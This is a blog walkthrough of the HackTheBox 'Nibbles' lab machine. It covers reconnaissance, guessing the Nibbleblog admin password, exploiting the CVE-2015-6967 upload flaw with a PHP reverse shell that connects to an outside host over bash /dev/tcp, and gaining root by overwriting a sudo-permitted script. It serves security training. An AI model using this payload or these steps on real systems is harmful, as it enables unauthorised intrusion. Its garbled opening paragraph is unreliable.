Home HackTheBox - Nibbles
Post
Cancel

HackTheBox - Nibbles

Foothold

I have a payment account at Hack the Box and I feel I should use it more than I do. When I’m not showing about their CTF style box, I like some challenges. The part that is that with the On box, I usually don’t write it. While I hone my skills in the hacking part, I don’t hone mine to document the process. when i post here i can miss a thing or two but i try to do it not documentation is as important as the actual system exploit process. something to know if you solve this problem more than your entertainment.

nibbles

With Nibbles, nothing is really new except for two things. First, I have to work on another content management system. Second, I learned something about hash cracking – but I’ll get to that in a moment.

Reconnaissance

First thing first, we run a quick initial nmap scan to see which ports are open and which services are running on those ports.

nmap scan (open ports)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Nibbles-full-port-scan.txt 10.10.10.75
Warning: 10.10.10.75 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.75
Host is up (0.096s latency).
Not shown: 65508 closed ports
PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp    open     http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
4418/tcp  filtered axysbridge

Apache/4.18 (port 80)

By inspecting the sources on port 80, we see there is a hidden directory /nibbleblog/:

view-source-hidden-dir

Once we wo to his “hidden” directory we see that is qa website powered by Nibbleblog, which turns out to be an open source CMS for blogs:

nibbleblog

While I was navigating on the website, I encountered the following error:

XML error

Maybe there is something to do with it, but let’s continue our enumeration.

Nibbleblog

Since I’m looking for more information, I ran dirb on http://10.10.10.75/nibbleblog/:

dirb

On http://10.10.10.75/nibbleblog/README, we get the version number (v4.0.3) of Nibbleblog:

version

Bibbidi-Bobbidi-Boo…there is an exploit available!

searchsploit

But it requires credentials so we have to go further:

exploit-options

Credentials

I made a quick search → “nibbleblog default credentials”. Unfortunately, I didn’t find anything. \

Nevertheless, there is an admin’s page: http://10.10.10.75/nibbleblog/admin.php. We can try some basic username/password combinations like admin/admin, root/root or even nibbles/nibbles.

admin/nibbles worked:

success

Metasploit

Let’s go back to the exploit:

msf

By doing so, we have a meterpreter. That’s nice, but in order to avoid this “black box” method, let’s exploit the vulnerability without this tool.

CVE-2015-6967 exploitation

Thanks to https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html, we can follow the steps to perform the exploit:

packetstorm

  1. Prepare our PHP reverse shell:
1
2
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.7/1234 0>&1'");
  1. Upload our malicious file to http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image:

plugins > my image

  1. Run a listener → nc -lnvp 1234

  2. Visit http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php. Now we have a shell:

shell

User (nibbler)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home
<ml/nibbleblog/content/private/plugins/my_image$ cd /home                    
nibbler@Nibbles:/home$ ls
ls
nibbler
nibbler@Nibbles:/home$ cd nibbler
cd nibbler
nibbler@Nibbles:/home/nibbler$ ls -la
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29  2017 .
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-r-------- 1 nibbler nibbler   33 Dec 23 15:17 user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
e598bb90bc9ff2f87b72e2083c1cb95a
nibbler@Nibbles:/home/nibbler$

Let’s see what we can run with sudo:

1
2
3
4
5
6
7
$ sudo -l 
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Root

Okay so we just have to replace /home/nibbler/personal/stuff/monitor.sh by malicious content:

1
2
3
4
5
nibbler@Nibbles:/home/nibbler$ mkdir -p personal/stuff
nibbler@Nibbles:/home/nibbler$ echo "cat /root/root.txt" > /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
b59ce6c276598083872b41d4785c3e8

This post is licensed under 0x3n0 by the author.

HackTheBox - Shocker

HackTheBox - Valentine